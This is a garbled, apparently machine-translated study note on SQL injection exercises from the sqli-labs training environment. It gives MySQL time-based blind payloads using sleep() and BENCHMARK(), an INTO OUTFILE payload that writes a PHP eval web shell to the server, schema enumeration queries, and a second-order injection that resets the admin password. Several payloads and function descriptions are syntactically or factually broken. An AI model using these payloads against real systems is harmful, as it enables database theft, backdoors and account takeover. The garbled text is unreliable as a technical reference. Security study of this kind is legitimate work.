SQL Injection Learning Note 4

delay injection, delay injection each database has a different delay function

and If (ASCII (substr (), =105,1,sleep (5))--+

This is the delay injection of MySQL, when ASCII (substr (Database (), =105 ) is true, returns 1for false execution Sleep (5), there will be 5 seconds of delay error

function that repeats the specified action

The BENCHMARK (count,expr) function repeats the expression expr count times , and then returns the execution time. This function can be used to determine the speed of the MySQL processing expression.

UNION SELECT (IF (SUBSTRING) =char (current,1,1), BENCHMARK (50000000,encode (' MSG ', ' by 5 seconds '), null)), 2,3 from ( Select Database () as current) as tb1--+

1 trunc(value,precision) by Precision(Precision)Intercept a number,No rounding operations are performed.
2 Round(value,precision) based on the given accuracy(Precision)Enter a value.
3 Ceil (value)produces a value greater than or equal to the specified (value) is the smallest integer.
4 floor(value) andCeil() Instead, produces a value that is less than or equal to the specified (value) is the smallest integer.
5 sign (value)and the absolute value functionABS() instead. ABS() is given the amount of the value rather than its symbol,Sign (value)The symbol for the value is given instead of the quantity.

This is an explanation of the common functions of truncated strings http://www.cnblogs.com/lcamry/p/5504374.html

here are some explanations for the blinds . http://www.cnblogs.com/lcamry/p/5763129.html

Mysql file Import and export http://www.cnblogs.com/lcamry/p/5763111.html

Loadfile Common path http://www.cnblogs.com/lcamry/p/5729087.html

UNION SELECT, ' <?php @eval ($_post["Mima"])?> ' into outfile ' c:\\wamp\\www\\sqllib\\less-7\\yijuhua.php '--+

Import a Word trojan, if there is permission, after import can be connected with Cknife

an experiment of experiment bar :http://jxust.shiyanbar.com/course/50978/vid/1502

The mysql_real_escape_string () function escapes special characters in strings used in SQL statements.

The following characters are affected:

• \x00
• \ n
• \ r
• \
• ‘
• "
• \x1a

Get database name

Select schema_name from Information_schema.schemata

Get table name

Select table_name from Information_schema.tables from where

Table_name= ' schema_name '

Get Column Name

Select column_name from Information_schema.columns where table_name= ' table_name '

Get content

Select ' column_name ' from Schema_name.table_name

Sqlilabs 's Less-24 has experienced the next two injections

Register to create an account with admin ' # , password is 123

you can make a change to the password, and when you change the password, two injections will occur, because # will update the query with the following comment

can see by changing the admin ' # user's password, the result changed the password of the admin , then we can be set by the password to login to the administrator account, but also a and this has the same effect is SQL constraint attacks, but also can be disguised login administrator password, and do not need the original administrator password, of course, the administrator account needs to know

SQL Injection Learning Note 4